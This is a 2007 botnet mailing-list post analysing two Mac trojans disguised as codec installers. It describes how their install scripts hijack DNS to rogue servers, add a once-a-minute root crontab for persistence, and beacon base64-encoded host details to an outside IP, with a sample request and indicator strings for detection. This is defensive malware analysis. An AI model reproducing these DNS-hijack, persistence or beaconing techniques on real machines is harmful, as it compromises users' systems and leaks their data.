To report a botnet PRIVATELY please email: [EMAIL PROTECTED] ----------
I've analyzed two variants of this trojan, procoded1000.dmg and ultracodec1000.dmg, provided to me by Chris (thanks, Chris!).
These trojans basically consist of three scripts and a browser plugin (used by Safari / Firefox? I'm not sure.). On the disk image: - install.pkg/Contents/Resources/post{install,upgrade} are the same script - install.pkg/Contents/Resources/pre{install,upgrade} are the same script - plugins.settings (from Archive.pax.gz, located in install.pkg/Contents) is the same as above preinstall scripts Only difference between two packages appears to be the dns servers: procodec1000: s1=85.255.116.61 s2=85.255.112.103 ultracodec1000: s1=85.255.115.34 s2=85.255.112.158 - Preinstall scripts (and plugins.settings from Archive.pax.gz, which is the same) sets the compromised machine's DNS to the above servers (depending on which trojan is installed). In addition, it tries to set a crontab for root that executes itself (as /Library/Internet Plug-Ins/plugins.settings) once a minute. - Postinstall scripts executes sendreq (found in Archive.pax.gz), and then removes sendreq. sendreq sends 'mac;<cpu type>;<hostname>' as a base64-encoded argument to the 'Accept-Language' header to 85.255.121.37. Example: GET / HTTP/1.1 Accept-Language: bWFjO3Vua25vd247ZXJpYWRvcg== Host: 85.255.121.37 - Installs /Library/Internet Plug-Ins/Mozillaplug.plugin/Contents/MacOS/VerifiedDownloadPlugin I'm not certain what this does. There's not much by way of suspicious strings in this executable, and I don't have a way to safely execute it to watch what it does. Interesting strings (for antivirus or overly suspcious sysadmins :) ): install.pkg/Contents/Resources/English.lproj/Description.plist: <string>Its a suppa puppa desc yo</string> In Archive.pax.gz: Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.bak: Verified RoveSupa Plugin Mozillaplug.plugin/Contents/Resources/VerifiedDownloadPlugin.rsrc.ROVE: Verified RoveSupa Plugin On Sun, Nov 04, 2007 at 09:11:03AM -0500, Chris Lee babbled thus: > Sure, I saved a couple copies. I'll send you a link in a second email. If > anyone else is interested in a copy, please let me know. -- PinkFreud Chief of Security, Nightstar IRC network irc.nightstar.net | www.nightstar.net Server Administrator - Blargh.CA.US.Nightstar.Net Unsolicited advertisements sent to this address are NOT welcome.
signature.asc
Description: Digital signature
_______________________________________________ To report a botnet PRIVATELY please email: [EMAIL PROTECTED] All list and server information are public and available to law enforcement upon request. http://www.whitestar.linuxbox.org/mailman/listinfo/botnets